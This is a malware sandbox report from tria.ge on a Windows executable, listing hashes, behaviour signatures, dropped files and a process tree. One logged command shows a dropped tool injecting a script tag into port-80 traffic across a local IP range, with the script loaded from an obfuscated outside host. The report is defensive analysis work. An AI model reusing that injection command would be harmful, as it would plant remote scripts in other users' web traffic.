Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

8

Static

static

3

6216999ae0...50.exe

windows7-x64

8

6216999ae0...50.exe

windows10-2004-x64

8

Analysis

  • max time kernel
    146s
  • max time network
    119s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26/12/2023, 09:03

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    6216999ae03e9bc94f4f910918a3d550.exe

  • Size

    177KB

  • MD5

    6216999ae03e9bc94f4f910918a3d550

  • SHA1

    ac9e37b3422fa4c6c34725e8314e04c91a185f81

  • SHA256

    410aae7b289f477ef338588a1cf9f234a6a58cdfe59bb75bc6417d21e305f056

  • SHA512

    87dcf16c6cef0cd60a5a8655694c472fa3b55533de167ccd29f5840c6138c9b840b03669f043a14bcf4d68ef182a7287ce3004bcdeba252853817aa427da0c69

  • SSDEEP

    3072:Q1r61/kTgwCiCAeHwSocr8FrAlFs13G5hDO9HTyIFZWRk1nC0Hunbrd/AoutD:ur3bCiReQS/QrAlFsaDOFT5ZWRkBun/C

Score
8/10

Malware Config

Signatures

  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 5 IoCs
  • Drops file in System32 directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\6216999ae03e9bc94f4f910918a3d550.exe
    "C:\Users\Admin\AppData\Local\Temp\6216999ae03e9bc94f4f910918a3d550.exe"
    1⤵
    • Drops file in Drivers directory
    • Drops file in System32 directory
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:1352
    • C:\Windows\SysWOW64\360uatn.exe
      -idx 0 -ip 10.127.0.2-10.127.0.254 -port 80 -insert "<script language=JavaScript src=http://e%61b.P%61ss%69ngG%61s.n%65t/tj.js></script>"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      PID:2440
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c 12.bat
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2492
      • C:\Windows\SysWOW64\PING.EXE
        ping 127.0.0.1 -n 5
        3⤵
        • Runs ping.exe
        PID:1324
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
      PID:2224

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Windows\SysWOW64\360uatn.exe
      Filesize

      93KB

      MD5

      5a135b608253c6040337d3311554e477

      SHA1

      aca6bfe72f762b2dc9ca3f36f2fec7aa1cea1dcc

      SHA256

      350328a72ad0cdb1c5afe54b1084586b81ce4e194e826ed27d4eb1f5f913c94c

      SHA512

      05ce32a24646134e3842df833506fac87b0ed747fef7f8c3d39b2c922535f611d1c372cb7dee5bc5c1abd238b95837bc408f2e8eaf84375d7c2a0146ac627aee

      Download Submit

    • C:\Windows\SysWOW64\360uatn.exe
      Filesize

      1.2MB

      MD5

      d39c94af221e3afd8b5a46c5beb3b778

      SHA1

      aac46699e72d26a508894c4ce8a06f2cbbd10709

      SHA256

      cf14ad680289728f0d87a29a074b294599bb132d562c666bab1a283974727e09

      SHA512

      8902bb9d884930e46a700b9124c72001376e3efbb7214455c525a1e4271a95b2756fbbdbc7d2f7793744b8fd2d8ddc070732e43b2ad4eef091a433bfd38077ca

      Download Submit

    • C:\Windows\SysWOW64\WPCAP.DLL
      Filesize

      92KB

      MD5

      4d892fa0a54e6bfdd4f4864775c1c51b

      SHA1

      a710131f8c2653c1556cfb1d078644c3f18951a7

      SHA256

      7670804e27240f191cd77b6576b187f0bee54edb393044c11c63d39ca727c8f0

      SHA512

      1c3e61875272ff3ca8132334cd4069c466e47e47a48ac3f3f98d503501a88ef457b730ee65656b367ac36c8947ce616fc337e29f07c1cf9a175448c793cdd813

      Download Submit

    • memory/1352-0-0x0000000000400000-0x0000000000485000-memory.dmp

      Filesize

      532KB

      Download

    • memory/1352-1-0x0000000000400000-0x0000000000485000-memory.dmp

      Filesize

      532KB

      Download

    • memory/1352-4-0x0000000000400000-0x0000000000485000-memory.dmp

      Filesize

      532KB

      Download

    • memory/2440-22-0x0000000000400000-0x000000000040F000-memory.dmp

      Filesize

      60KB

      Download

    • memory/2440-21-0x0000000000580000-0x0000000000590000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2440-17-0x0000000000560000-0x0000000000575000-memory.dmp

      Filesize

      84KB

      Download

    • memory/2440-10-0x0000000000400000-0x000000000040F000-memory.dmp

      Filesize

      60KB

      Download